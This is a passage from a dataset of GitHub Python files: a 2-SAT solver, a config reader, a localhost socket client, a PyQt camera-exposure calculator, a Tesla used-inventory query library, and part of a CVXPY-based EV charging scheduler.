True:\n            u = dfs_stack.pop()\n            visited[u] = False\n            component.append(u)\n            if u == v:\n                break\n        scc.append(component)\n\ndef is_satisfiable():\n    for component in scc:\n        for v in component:\n            if -v in component:\n                return False\n    return True\n\ndef find_assignment():\n    assignment = [None] * N\n    for component in scc:\n        for v in component:\n            if 
assignment[abs(v) - 1] is None:\n                assignment[abs(v) - 1] = 1 if v > 0 else 0\n    return assignment\n\nN, M = map(int, input().split())\ngraph = defaultdict(list)\n\nfor _ in range(M):\n    u, v = map(int, input().split())\n    graph[-u].append(v)\n    graph[-v].append(u)\n\ndfs_num = [0] * (2 * N + 1)\ndfs_low = [0] * (2 * N + 1)\nvisited = [False] * (2 * N + 1)\ndfs_stack = deque()\ncounter = 0\nscc = []\n\n# start a DFS from both literals of every variable; negative literals are\n# stored under their negative keys in graph, and wrap to the upper half of\n# the dfs_num/dfs_low arrays via Python's negative indexing\nfor v in range(1, N + 1):\n    if dfs_num[v] == 0:\n        dfs(v)\n    if dfs_num[-v] == 0:\n        dfs(-v)\n\nif is_satisfiable():\n    print(1)\n    assignment = find_assignment()\n    print(*assignment)\nelse:\n    print(0)\n","repo_name":"dukjoon/baekjoon","sub_path":"solved/11281.py","file_name":"11281.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9133126252","text":"\"\"\"provides read/write config file functions\"\"\"\n\nfrom configparser import ConfigParser\nfrom configparser import NoSectionError, MissingSectionHeaderError\nimport sys\n\nfrom . import constants\n\n\ndef read(args):\n    \"\"\"read config file\"\"\"\n    config_file = args.config\n    if not config_file:\n        config_file = constants.path_config\n\n    try:\n        conf_parser = ConfigParser()\n        conf_parser.read(config_file)\n        defaults = constants.OrderedDict(\n            conf_parser.items(constants.dflt_section))\n    except (NoSectionError, MissingSectionHeaderError):\n        if args.config:\n            print('Cannot read config file! Run install script.')\n        defaults = constants.OrderedDict()\n\n    for opt, val in constants.default_config.items():\n        if opt not in defaults:\n            defaults[opt] = val\n\n    if not str(defaults['width_tot']).isdigit():\n        defaults['width_tot'] = constants.default_config['width_tot']\n\n    return defaults\n\n\ndef write(args, out_stream):\n    \"\"\"write config file\"\"\"\n    config = ConfigParser()\n    config.add_section(constants.dflt_section)\n    for opt in constants.default_config:\n        config.set(constants.dflt_section, opt, str(args[opt]).strip())\n\n    if out_stream is sys.stdout:\n        config.write(out_stream)\n    else:\n        with open(out_stream, 'w') as out_file:\n            config.write(out_file)\n","repo_name":"WenchaoLin/qjobs","sub_path":"qjobs/configfile.py","file_name":"configfile.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"24841378559","text":"import socket\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserver.connect(('127.0.0.1',8088)) \n\ndata = server.recv(1024)\nprint(data.decode())\n\nserver.send(\"Ok received!\".encode())\n\nserver.close()","repo_name":"mmpcukp/RockPaperScissor_extended","sub_path":"networking/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31790824172","text":"import os\nimport sys\nimport math\nimport json\n# Standard Imports + Math Import\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n# Make the file run from the parent directory\n\nfrom utils.main import ReferenceNumbers\nfrom utils.data import ref\n# Code Handler Imports\n\n# PyQt5 (UI Framework) Imports\nfrom PyQt5 import QtWidgets, uic, QtGui\n\n\nclass ProgramUi(QtWidgets.QMainWindow):\n    def __init__(self):\n        '''View Initialisation'''\n        super(ProgramUi, self).__init__()\n        uic.loadUi('app/basic.ui', self)\n        self.setWindowTitle('Photography Program')\n        # Initialises the window from the .ui file\n        self.OPTIONS = [\"Lighting Condition\", \"ISO\", \"Shutter Speed\", \"Aperture\"]\n        \n        
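# The combo box below selects which setting is solved for; update_combo()\n        # removes that choice from CURRENT_LABELS so the other three remain user inputs.\n        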
self.setting_type = self.findChild(QtWidgets.QComboBox, 'setting1_Combo')\n self.setting_type.addItems(self.OPTIONS)\n self.setting_type.currentTextChanged.connect(self.update_combo)\n\n self.settings1_label = self.findChild(QtWidgets.QLabel, 'value1_Label')\n self.settings2_label = self.findChild(QtWidgets.QLabel, 'value2_Label')\n self.settings3_label = self.findChild(QtWidgets.QLabel, 'value3_Label')\n\n self.setting1_input = self.findChild(QtWidgets.QTextEdit, 'setting1_textEdit')\n self.setting2_input = self.findChild(QtWidgets.QTextEdit, 'setting2_textEdit')\n self.setting3_input = self.findChild(QtWidgets.QTextEdit, 'setting3_textEdit')\n self.setting1_input.textChanged.connect(self.update)\n self.setting2_input.textChanged.connect(self.update)\n self.setting3_input.textChanged.connect(self.update)\n\n self.CURRENT_LABELS = list(self.OPTIONS)\n self.CURRENT_LABELS.remove(self.setting_type.currentText())\n # Creates All the Inputs & Settings\n\n self.ReferenceHandler = ReferenceNumbers()\n # Creates the reference handler\n\n self.result_lighting = self.findChild(QtWidgets.QLabel, 'answer_lighting')\n self.result_iso = self.findChild(QtWidgets.QLabel, 'answer_iso')\n self.result_shutter = self.findChild(QtWidgets.QLabel, 'answer_shutter')\n self.result_aperture = self.findChild(QtWidgets.QLabel, 'answer_aperture')\n\n\n self.show()\n \n def update_combo(self):\n tempDict = {}\n\n tempDict[self.CURRENT_LABELS[0]] = self.setting1_input.toPlainText()\n tempDict[self.CURRENT_LABELS[1]] = self.setting2_input.toPlainText()\n tempDict[self.CURRENT_LABELS[2]] = self.setting3_input.toPlainText()\n \n \n self.CURRENT_LABELS = list(self.OPTIONS)\n self.CURRENT_LABELS.remove(self.setting_type.currentText())\n self.settings1_label.setText(\"{}\".format(self.CURRENT_LABELS[0]))\n self.settings2_label.setText(\"{}\".format(self.CURRENT_LABELS[1]))\n self.settings3_label.setText(\"{}\".format(self.CURRENT_LABELS[2]))\n\n if self.settings1_label.text() in tempDict:\n self.setting1_input.setText(tempDict[self.settings1_label.text()])\n else:\n self.setting1_input.setText(\"\")\n \n if self.settings2_label.text() in tempDict:\n self.setting2_input.setText(tempDict[self.settings2_label.text()])\n else:\n self.setting2_input.setText(\"\")\n \n if self.settings3_label.text() in tempDict:\n self.setting3_input.setText(tempDict[self.settings3_label.text()])\n else:\n self.setting3_input.setText(\"\")\n \n def update(self):\n tdict = {}\n\n tdict[self.CURRENT_LABELS[0]] = self.setting1_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n tdict[self.CURRENT_LABELS[1]] = self.setting2_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n tdict[self.CURRENT_LABELS[2]] = self.setting3_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n if self.ReferenceHandler.isValid(tdict[self.CURRENT_LABELS[0]], self.CURRENT_LABELS[0]) and self.ReferenceHandler.isValid(tdict[self.CURRENT_LABELS[1]], self.CURRENT_LABELS[1]) and self.ReferenceHandler.isValid(tdict[self.CURRENT_LABELS[2]], self.CURRENT_LABELS[2]):\n ReferenceValues = self.ReferenceHandler.getAllReferenceValues(tdict)\n CurrentAverage = sum(ReferenceValues.values())\n RequiredAverage = 16\n\n SelectedValue = RequiredAverage-CurrentAverage\n\n selected = self.setting_type.currentText()\n selected = selected.replace(\" Speed\", \"\")\n selected = selected.replace(\" Condition\", \"\")\n \n if SelectedValue > 0 and SelectedValue <= 8:\n print(f\"Required 
{self.setting_type.currentText()} Value: {ref[str(SelectedValue)][selected]}\")\n                tdict[self.setting_type.currentText()] = ref[str(SelectedValue)][selected]\n                for item in tdict:\n                    item_type = item.replace(\" Speed\", \"\").replace(\" Condition\", \"\")\n                    \n                    if self.ReferenceHandler.isValid(tdict[item], item_type):\n                        if item == \"ISO\":\n                            self.result_iso.setText(f\"{item}: {tdict[item]}\")\n                        elif item == \"Aperture\":\n                            self.result_aperture.setText(f\"{item}: f/{tdict[item]}\")\n                        elif item_type == \"Shutter\":\n                            self.result_shutter.setText(f\"{item}: {tdict[item]}s\")\n                        elif item == \"Lighting Condition\":\n                            self.result_lighting.setText(f\"Lighting Condition: {tdict[item]}\")\n                    else:\n                        if item == \"ISO\":\n                            self.result_iso.setText(f\"{item}: None\")\n                        elif item == \"Aperture\":\n                            self.result_aperture.setText(f\"{item}: None\")\n                        elif item_type == \"Shutter\":\n                            self.result_shutter.setText(f\"{item}: None\")\n                        elif item_type == \"Lighting\":\n                            self.result_lighting.setText(f\"Lighting Condition: None\")\n                return\n            elif SelectedValue < 0:\n                self.show_error(f\"Too Bright\", f\"Change of {(SelectedValue - 1)*(-1)} stops is required\")\n                print(f\"Too Bright - Change of {(SelectedValue - 1)*(-1)} stops is required\")\n            elif SelectedValue > 8:\n                self.show_error(f\"Too Dark\", f\"Change of {SelectedValue - 8} stops is required\")\n                print(f\"Too Dark - Change of {SelectedValue - 8} stops is required\")\n            elif SelectedValue == 0:\n                self.show_error(f\"Error\", f\"You need to change your settings by 1 stop\")\n                print(f\"You need to change your settings by 1 stop\")\n\n\n        else:\n            tdict = {}\n\n            tdict[self.CURRENT_LABELS[0]] = self.setting1_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n            tdict[self.CURRENT_LABELS[1]] = self.setting2_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n            tdict[self.CURRENT_LABELS[2]] = self.setting3_input.toPlainText().replace(\"f/\", \"\").replace(\".0\", \"\").replace(\"ISO\", \"\")\n            for item in tdict:\n                item_type = item.replace(\" Speed\", \"\").replace(\" Condition\", \"\")\n                \n                if self.ReferenceHandler.isValid(tdict[item], item_type):\n                    if item == \"ISO\":\n                        self.result_iso.setText(f\"{item}: {tdict[item]}\")\n                    elif item == \"Aperture\":\n                        self.result_aperture.setText(f\"{item}: f/{tdict[item]}\")\n                    elif item_type == \"Shutter\":\n                        self.result_shutter.setText(f\"{item}: {tdict[item]}s\")\n                    elif item == \"Lighting Condition\":\n                        self.result_lighting.setText(f\"Lighting Condition: {tdict[item]}\")\n                else:\n                    if item == \"ISO\":\n                        self.result_iso.setText(f\"{item}: None\")\n                    elif item == \"Aperture\":\n                        self.result_aperture.setText(f\"{item}: None\")\n                    elif item_type == \"Shutter\":\n                        self.result_shutter.setText(f\"{item}: None\")\n                    elif item_type == \"Lighting\":\n                        self.result_lighting.setText(f\"Lighting Condition: None\")\n\n    def show_error(self, title, message):\n        msg = QtWidgets.QMessageBox()\n        msg.setWindowTitle(title)\n        msg.setText(message)\n        msg.setIcon(QtWidgets.QMessageBox.Critical)\n        msg.setStandardButtons(QtWidgets.QMessageBox.Ok)\n\n        x = msg.exec_()\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = ProgramUi()\napp.exec_()","repo_name":"WidjEt24/YR8_INV1","sub_path":"python/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26781129575","text":"# teslahunter - a library for querying the Tesla Used inventory API\n\nimport enum, json, requests, 
urllib, time, pickle\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom typing import List, Tuple, Union\nfrom datetime import date\nfrom os import path\n\n\nINVENTORY_API = \"https://www.tesla.com/inventory/api/v1/inventory-results?query=\"\n\n\nclass Model(enum.Enum):\n    M3 = \"Model 3\"\n    MS = \"Model S\"\n    MX = \"Model X\"\n    MY = \"Model Y\"\n    UNKNOWN = \"Unknown Model\"\n\n\nclass ExteriorColor(enum.Enum):\n    RED = \"Red Multi-Coat\"\n    WHITE = \"Pearl White Multi-Coat\"\n    SILVER = \"Silver Metallic\"\n    BLUE = \"Deep Blue Metallic\"\n    BLACK = \"Solid Black\"\n    GRAY = \"Midnight Silver Metallic\"\n    GREY = \"Model X Grey\"\n    BROWN = \"Brown Metallic\"\n    UNKNOWN = \"Unknown Exterior Color\"\n\n\nclass InteriorColor(enum.Enum):\n    PREMIUM_BLACK = \"Premium Black\"\n    PREMIUM_WHITE = \"Premium Black and White\"\n    TAN = \"Tan\"\n    CREAM = \"Cream Premium\"\n    WHITE = \"White\"\n    BLACK = \"Black\"\n    GREY = \"Grey\"\n    BLACK_TEXTILE = \"Black Cloth\"\n    UNKNOWN = \"Unknown Interior Color\"\n\n\nclass Drivetrain(enum.Enum):\n    # M3\n    LRAWD = \"Long Range AWD\"\n    LRAWDP = \"Long Range AWD Performance\"\n    LRRWD = \"Long Range RWD\"\n    MRRWD = \"Medium Range RWD\"\n    SRAWD = \"Standard Range AWD\"\n    SRPRWD = \"Standard Range Plus RWD\"\n    # MS/MX\n    _60 = \"60Kwh\"\n    _70 = \"70Kwh\"\n    _75 = \"75Kwh\"\n    _85 = \"85Kwh\"\n    _70D = \"Dual Motor 70Kwh\"\n    _75D = \"Dual Motor 75Kwh\"\n    _85D = \"Dual Motor 85Kwh\"\n    _90D = \"Dual Motor 90Kwh\"\n    _100DE = \"Dual Motor 100Kwh\"\n    P85 = \"85Kwh Performance\"\n    P85D = \"Dual Motor 85Kwh Performance\"\n    P85DL = \"Dual Motor 85Kwh Ludicrous\"\n    P90D = \"Dual Motor 90Kwh Performance\"\n    P90DL = \"Dual Motor 90Kwh Ludicrous\"\n    P100D = \"Dual Motor 100Kwh Performance\"\n    P100DL = \"Dual Motor 100Kwh Ludicrous\"\n    LRPLUS = \"Long Range Plus AWD\"\n    UNKNOWN = \"Unknown Drivetrain\"\n\n\nclass Wheels(enum.Enum):\n    EIGHTEEN = '18\" Aero Wheels'\n    NINETEEN = '19\" Sport Wheels'\n    TWENTY = '20\" Fragile Wheels'\n    TWENTY_ONE = '21\" Wheels'\n    TWENTY_TWO = '22\" Wheels'\n    UNKNOWN = \"Unknown Wheel Type\"\n\n\n# Return descriptions for UX\n\n\ndef get_descriptions(t: enum.Enum):\n    return [v.value for v in t]\n\n\n# Lookup an Enum value based on the description\n\n\ndef get_value(t: enum.Enum, description: str):\n    for e in t:\n        if e.value == description:\n            return e\n    # Also print out the unknown description\n    print(f\"Unknown {description} while looking up {t}\")\n    return t.UNKNOWN  # this is by convention\n\n\n# Lookup an Enum value based on the code in results\n\n\ndef lookup_code(t: enum.Enum, code: str):\n    # If code starts with a number, prefix code with an _\n    if code[0].isdigit():\n        code = \"_\" + code\n\n    for e in t:\n        if e.name == code:\n            return e\n    # Also print out the unknown description\n    print(f\"Unknown {code} while looking up {t}\")\n    return t.UNKNOWN  # this is by convention\n\n\nclass Car:\n    VIN: str\n    ExteriorColor: ExteriorColor\n    InteriorColor: InteriorColor\n    Wheels: str\n    Mileage: int\n    Drivetrain: Drivetrain\n    AccelerationBoost: bool\n    OriginalDeliveryDate: str  # todo: datetime\n    History: str\n    PhotoUris: List[str]\n    Price: int\n    PriceHistory: List[int]\n    ModelYear: int\n    Location: str\n    VehicleHistory: str\n    Model: Model\n\n    def __init__(\n        self,\n        vin: str,\n        exterior_color: ExteriorColor,\n        interior_color: InteriorColor,\n        drivetrain: Drivetrain,\n        wheels: str,\n        mileage: int,\n        photos: List[str],\n        year: int,\n        location: str,\n        price: int,\n        vehicle_history: str,\n        model: Model,\n    ):\n\n        self.VIN = vin\n        self.ExteriorColor = 
exterior_color\n        self.InteriorColor = interior_color\n        self.Drivetrain = drivetrain\n        self.Wheels = wheels\n        self.Mileage = mileage\n        self.PhotoUris = photos\n        self.ModelYear = year\n        self.Location = location\n        self.Price = price\n        self.VehicleHistory = vehicle_history\n        self.Model = model\n\n    def get_tesla_details_page_uri(self):\n        return f\"https://www.tesla.com/used/{self.VIN}\"\n\n\nclass Price:\n    Prices: List[Tuple[int, datetime]]\n\n    def __init__(self):\n        # start with an empty price history; the annotation above alone\n        # does not create the list\n        self.Prices = []\n\n    def get_current(self) -> Tuple[int, datetime]:\n        if len(self.Prices) == 0:\n            return None\n        else:\n            return self.Prices[-1]\n\n    def add(self, price: int, dt: datetime) -> None:\n        self.Prices.append((price, dt))\n\n\n# This is the public entry point\n\n\ndef query(model, drivetrains, exterior_colors, interior_colors, wheels):\n    query = create_query(model, drivetrains, exterior_colors, interior_colors, wheels)\n    return query_tesla(query, model)\n\n\ndef create_query(model, drivetrains, exterior_colors, interior_colors, wheels):\n    def to_str_list(l: List) -> List[str]:\n        return [e.name for e in l]\n\n    query = {\n        \"query\": {\n            \"condition\": \"used\",\n            \"arrangeby\": \"Price\",\n            \"order\": \"asc\",\n            \"market\": \"US\",\n            \"language\": \"en\",\n            \"region\": \"north america\",\n        },\n    }\n\n    query[\"query\"][\"model\"] = model.name.lower()\n\n    # programmatically build options based on presence of options (none means no filter)\n\n    trim = to_str_list(drivetrains)\n    paint = to_str_list(exterior_colors)\n    interior = to_str_list(interior_colors)\n    whls = to_str_list(wheels)\n\n    options = {}\n    if len(trim) > 0:\n        options[\"TRIM\"] = trim\n    if len(paint) > 0:\n        options[\"PAINT\"] = paint\n    if len(interior) > 0:\n        options[\"INTERIOR\"] = interior\n    if len(whls) > 0:\n        options[\"WHEELS\"] = whls\n    query[\"query\"][\"options\"] = options\n\n    print(query)\n    return query\n\n\ndef get_pictures(car) -> List[str]:\n    photos = car[\"VehiclePhotos\"]\n    uris = []\n    for photo in photos:\n        uris.append(photo[\"imageUrl\"])\n    return uris\n\n\n# Function to retrieve a page of results from tesla inventory API\n\n\ndef query_tesla(query, model: Model) -> List[Car]:\n    cars = []\n    offset = 0\n\n    def query_page(query, offset):\n        query[\"outsideOffset\"] = offset\n        query_str = json.dumps(query)\n        url_str = urllib.parse.quote(query_str)\n        r = requests.get(INVENTORY_API + url_str)\n        return r.json()\n\n    while True:\n        r = query_page(query, offset)\n\n        results = r[\"results\"]\n        for result in results:\n            vin = result[\"VIN\"]\n            price = result[\"Price\"]\n            location = result.get(\"MetroName\", None)\n            mileage = result[\"Odometer\"]\n            year = result[\"Year\"]\n            vehicle_history = result[\"VehicleHistory\"]\n            car = Car(\n                vin,\n                lookup_code(ExteriorColor, result[\"PAINT\"][0]),\n                lookup_code(InteriorColor, result[\"INTERIOR\"][0]),\n                lookup_code(Drivetrain, result[\"TRIM\"][0]),\n                lookup_code(Wheels, result[\"WHEELS\"][0]),\n                mileage,\n                get_pictures(result),\n                year,\n                location,\n                price,\n                vehicle_history,\n                model,\n            )\n            cars.append(car)\n\n        if offset + len(r[\"results\"]) >= int(r[\"total_matches_found\"]):\n            break\n\n        offset += len(r[\"results\"])\n\n    return cars\n\n\n# Function that takes the vector of car objects and converts to a pandas dataframe\n\n\ndef to_dataframe(cars: List[Car]) -> pd.DataFrame:\n    df = create_cars_dataframe()\n    i = 0\n    for car in cars:\n        df.loc[i] = [\n            car.VIN,\n            car.Price,\n            car.Model.value,\n            car.ModelYear,\n            car.Drivetrain.value,\n            car.ExteriorColor.value,\n            car.InteriorColor.value,\n            car.Wheels.value,\n            car.Mileage,\n            car.Location,\n            
car.VehicleHistory,\n ]\n i += 1\n return df\n\n\ndef to_enum_list(t, l: List[str]):\n return [get_value(t, i) for i in l]\n\n\n# Daily script that pulls down daily listings for cars\n# Only do this query if there isn't a file with today's date in it already\n\n\ndef get_daily_data() -> pd.DataFrame:\n filename = f\"{date.today()}.pkl\"\n if not path.exists(filename):\n start = time.time()\n msdf = to_dataframe(query(Model.MS, [], [], [], []))\n m3df = to_dataframe(query(Model.M3, [], [], [], []))\n mxdf = to_dataframe(query(Model.MX, [], [], [], []))\n mydf = to_dataframe(query(Model.MY, [], [], [], []))\n end = time.time()\n\n print(f\"Query completed in: {end-start} seconds\")\n\n # Append all the dataframes together\n\n df = msdf.append(m3df)\n df = df.append(mxdf)\n df = df.append(mydf)\n\n df = df.reset_index(drop=True)\n df = df.drop_duplicates()\n df = df.set_index(\"VIN\")\n return df\n else:\n return pd.read_pickle(filename)\n\n\n# Generate synthetic data for n days based on a single day actual dataset\n\n\ndef synthesize_data(\n df, days=10, add_per_day=10, sold_per_day=5, price_adjustment=350\n) -> List[pd.DataFrame]:\n\n # Simulate adding add_per_day new cars per day by removing cars from the 10th day list\n\n dfs = [df]\n current_df = df\n for _ in range(days):\n rows = len(current_df.index)\n new_df = current_df.sample(frac=((rows - add_per_day) / rows))\n new_df[\"Price\"] = new_df[\"Price\"] - price_adjustment\n dfs.insert(0, new_df)\n current_df = new_df\n\n # Simulate selling sold_per_day cars by removing cars cumulatively from each list as sold\n\n sold_list = dfs[0].sample(sold_per_day).index.tolist()\n for i in range(1, len(dfs)):\n dfs[i] = dfs[i].drop(sold_list)\n newly_sold = dfs[i].sample(sold_per_day).index.tolist()\n sold_list += newly_sold\n\n return dfs\n\n\n# Next task is to build a new dataframe based query engine using a pair of dataframes\n# When working on the synthetic data, which is expressed as a List[pd.DataFrame], we\n# will generate two different dataframes. 
The first is the list of all the cars, along\n# with a new Status column that indicates whether the car is: FOR_SALE, SOLD.\n# There is another table which contains historical lists of prices, and are joined\n# against the cars table.\n\n\nclass Database:\n Cars: pd.DataFrame\n Prices: pd.DataFrame\n\n def __init__(self):\n self.Cars = create_cars_dataframe()\n self.Prices = create_prices_dataframe()\n\n\ndef create_cars_dataframe() -> pd.DataFrame:\n return pd.DataFrame(\n columns=[\n \"VIN\",\n \"Price\",\n \"Model\",\n \"Year\",\n \"Drivetrain\",\n \"Exterior Color\",\n \"Interior Color\",\n \"Wheels\",\n \"Mileage\",\n \"Location\",\n \"History\",\n ]\n )\n\n\ndef create_prices_dataframe() -> pd.DataFrame:\n return pd.DataFrame(columns=[\"VIN\", \"Price\", \"Date\"])\n\n\ndef create_database(data: List[pd.DataFrame]) -> Database:\n filename = \"db.pkl\"\n if not path.exists(filename):\n db = Database()\n df = pd.read_pickle(\"2020-11-25.pkl\")\n dfs = synthesize_data(df)\n for df in dfs:\n # Add records from df that aren't in db.Cars\n # Add prices from df to db.Prices\n pass\n\n pickle.dump(db, open(filename, \"wb\"))\n else:\n db = pickle.load(open(filename, \"rb\"))\n return db\n\n\ndef update_database(db: Database, data: Union[pd.DataFrame, List[pd.DataFrame]]):\n pass\n\n\ndef update_day(db: Database, data: pd.DataFrame):\n pass\n","repo_name":"jflam/tesla-hunter","sub_path":"teslahunter.py","file_name":"teslahunter.py","file_ext":"py","file_size_in_byte":11639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2173840871","text":"import pandas as pd\nimport numpy as np\nimport cvxpy as cvx\nimport boto3\ns3 = boto3.resource('s3')\n\n\nclass LoadModel(object):\n \"\"\"This class implements the charging control for a parking lot of EVs. It takes in input data on the start and end\n times for each session, and uses the uncontrolled load profile for each session to calculate the energy that must\n be delivered. There are numerous options for which control should be implemented, described in methods below such as\n `e19_controlled_load()'.\n \"\"\"\n\n def __init__(self, num_sessions=1, charge_rate=6.6):\n \"\"\"This method initializes many of the input and output variables used.\"\"\"\n\n self.uncontrolled_total_load = np.zeros((1, )) # The aggregate uncontrolled load profile\n self.controlled_total_load = np.zeros((1, ))\n self.num_sessions = num_sessions # The number of sessions / number of cars in the parking lot that day\n self.power = np.zeros((96, num_sessions)) # The uncontrolled load profile for each session\n self.arrival_inds = np.zeros(\n (num_sessions,)) # The arrival time of each session, expressed as an index between 0 and 95\n self.departure_inds = np.zeros((num_sessions,)) # The index of the departure time for each vehicle\n self.energies = np.zeros((num_sessions,)) # The energy delivered in each uncontrolled session\n self.charge_rate = charge_rate # The charge rate allowed. 
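The create_database/update_database/update_day helpers below this comment are left as pass stubs. One plausible completion, sketched under the assumptions that the daily frame is indexed by VIN (as get_daily_data returns it), that db.Cars is indexed the same way, and that db.Prices collects one (VIN, Price, Date) row per sighting; update_day_sketch is a hypothetical name, not the author's:

import pandas as pd
from datetime import date

def update_day_sketch(db, data: pd.DataFrame, day: date) -> None:
    # Fold a single day's snapshot into the two tables.
    for vin, row in data.iterrows():
        if vin not in db.Cars.index:
            db.Cars.loc[vin] = row            # first sighting: new inventory
        # always append the day's asking price to the history table
        db.Prices.loc[len(db.Prices)] = [vin, row["Price"], day]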
The default is level 2, 6.6 kW\n \n def input_data(self, uncontrolled_load, start_inds, end_inds):\n \"\"\"Here the data about the uncontrolled load is provided and the data is preprocessed.\"\"\"\n \n self.power = np.transpose(uncontrolled_load) # Transpose due to shape in CountyData class\n self.uncontrolled_total_load = np.sum(uncontrolled_load, axis=0) # Aggregate all the cars/sessions\n self.arrival_inds = start_inds\n self.departure_inds = end_inds\n for i in range(self.num_sessions):\n if self.departure_inds[i] >= 96: # If the session ends the next day, find the corresponding time in 0 to 96\n # E.g. if arrival is 80 and departure is 100 (the powerflex data has this), the new departure ind is 4.\n # If arrival is 2 and departure is 100, we want to avoid making the interval from 2 - 4 (only 30min when\n # it really is 1 day), so we set the departure time for the sake of the control as arrival time - 1.\n multiple, self.departure_inds[i] = np.divmod(self.departure_inds[i], 96)\n if self.departure_inds[i] >= self.arrival_inds[i]: # Do not make the session time shorter than it is\n if self.arrival_inds[i] > 0:\n self.departure_inds[i] = self.arrival_inds[i] - 1\n else:\n self.departure_inds[i] = 95\n if self.departure_inds[i] == self.arrival_inds[i]: # Each session should be at least one time step\n self.departure_inds[i] = self.arrival_inds[i] + 1\n\n # Calculate the session length as an input to the energy calculation\n if self.departure_inds[i] > self.arrival_inds[i]:\n session_length = self.departure_inds[i] - self.arrival_inds[i]\n else:\n session_length = 96 - self.arrival_inds[i] + self.departure_inds[i]\n # Energy calculated per session in kWh, 0.25 since each time step is 15min or 0.25 hours.\n self.energies[i] = np.minimum(0.25*np.sum(uncontrolled_load, axis=1)[i], 0.25*self.charge_rate*(session_length))\n\n def sdge_controlled_load(self, method='median', summer=True, percentile=50, verbose=False):\n \"\"\"Implements charging control with the SDG&E TOU rate schedule given in the sdge_values method below. 
See that\n method for an explanation of the rate schedule.\n \"\"\"\n\n energy_prices = sdge_values(method=method, summer=summer, percentile=percentile)\n\n # schedule is the cvxpy variable for the `power', the rate for each vehicle at each time step in kW.\n schedule = cvx.Variable((96, self.num_sessions))\n # The objective is calculated using the energy price: sum_times (price * kW * 0.25)\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n\n constraints = [schedule >= 0] # No V2G or discharging while plugged in\n for i in range(self.num_sessions):\n # No charging above the max rate:\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n # No charging before arrival\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n # No charging after departure\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n # In the case where the charging session runs over midnight, this is the form of the \"no charging before\n # arrival or after departure\" constraint:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n # Must deliver the right amount of energy to each vehicle (the same as was delivered in the uncontrolled case)\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n # CVXPY setup for solving the problem.\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('The objective result is', result)\n\n # Save the controlled output. sdge_controlled_power has the rate for each vehicle at each time step.\n self.sdge_controlled_power = schedule.value\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n\n def pge_cev_controlled_load(self, subscription_level=None, verbose=False):\n \"\"\"Implements the charging control for the PG&E Commercial EV rate schedule. The subscription rate is\n implemented as a cap. 
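Every control method in this class repeats the same linear program: minimize energy cost subject to a per-vehicle rate cap, plug-in window constraints, and an exact-energy equality. A self-contained toy instance for a single vehicle, using CVXPY's default open-source solver instead of the MOSEK license the original assumes (all numbers here are made up for illustration):

import cvxpy as cvx
import numpy as np

prices = np.ones(96)                 # $/kWh per 15-minute slot
prices[64:88] = 3.0                  # pretend 4pm-10pm peak pricing
rate = cvx.Variable(96)              # charging rate in kW per slot

cost = 0.25 * cvx.sum(cvx.multiply(prices, rate))   # $ = price * kW * 0.25 h
constraints = [rate >= 0, rate <= 6.6]              # level-2 charger cap
constraints += [rate[:40] == 0, rate[70:] == 0]     # plugged in slots 40-69
constraints += [0.25 * cvx.sum(rate) == 20.0]       # deliver exactly 20 kWh

prob = cvx.Problem(cvx.Minimize(obj=cost), constraints)
prob.solve()
print(prob.status, round(prob.value, 2))            # charging lands in cheap slots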
Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n if subscription_level is None:\n # The subscription level should be given because this is a very weak backup constraint:\n subscription_level = np.max(self.uncontrolled_total_load)\n\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw = pge_cev_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n # This does not affect the optimization as it is constant for a given subscription level, but here it is:\n obj += subscription_rate_per50kw * subscription_level/50\n\n constraints = [schedule >= 0]\n constraints += [cvx.sum(schedule, axis=1) <= subscription_level] # Keep charging below subscription level\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 